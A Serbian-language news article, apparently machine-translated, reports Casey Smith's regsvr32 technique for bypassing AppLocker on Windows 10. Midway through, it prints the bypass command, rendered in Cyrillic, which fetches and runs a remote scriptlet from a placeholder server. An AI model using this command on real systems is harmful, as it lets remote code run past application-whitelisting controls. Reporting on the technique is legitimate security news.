Истраживач из Колорада који иде под називом, Цасеи Смитх, открио је да се Регсвр32 може користити за заобилажење АппЛоцкер-а на Виндовс 10, а то је велики проблем за кориснике рачунара, посебно оне у пословном окружењу.

АппЛоцкер је први пут представљен у системима Виндовс 7 и Виндовс Сервер 2008 Р2. Дизајниран је тако да омогућава администраторима да одреде која група или корисници могу искористити неке или све апликације на основу јединственог идентитета датотека. Ако сте особа која има тенденцију да користи АппЛоцкер, онда би требало да буде опште познато да се она може користити за креирање одређених правила којима се апликацијама омогућава покретање или заустављање у њиховим нумерама.

За оне који можда нису свјесни, Регвр32 се може користити за регистрацију и одјављивање ДЛЛ-ова. Ово није алат са једним кликом јер се ради о услужном програму наредбеног ретка, па би само напредни корисници рачунара требали да настоје да искористе оно што може да понуди.

Разумијемо да употребом ове технике то не мијења регистар рачунарског система, што отежава администрацијама да знају да ли су уведене било какве промјене.

регсвр32 / с / н / у /и:хттп://сервер/филе.сцт сцробј.длл

„Невероватна ствар овде је да регсвр32 већ познаје проки, користи ТЛС, прати преусмеравања, итд. … И погодили сте за потписани, подразумевани бинарни МС. Дакле, све што требате учинити је угостити своју.сцт датотеку на локацији коју контролишете “, написао је Смитх.

Горе наведена техника не захтева административне привилегије и не мења регистра. Поред тога, скрипте се могу позивати и преко ХТТП-а или ХТТПС-а. Тренутно Мицрософт није издао закрпу због овог малог проблема, тако да је једина опција у овом тренутку блокирање Регсвр32 преко Виндовс заштитног зида.

Занимљиво је да софтверски гигант још увек није одговорио на овај безбедносни проблем који стоји пред његовим оперативним системом. Сада када је она на отвореном, очекујемо да чујемо нешто од компаније, заједно с разговорима о будућем закрпу.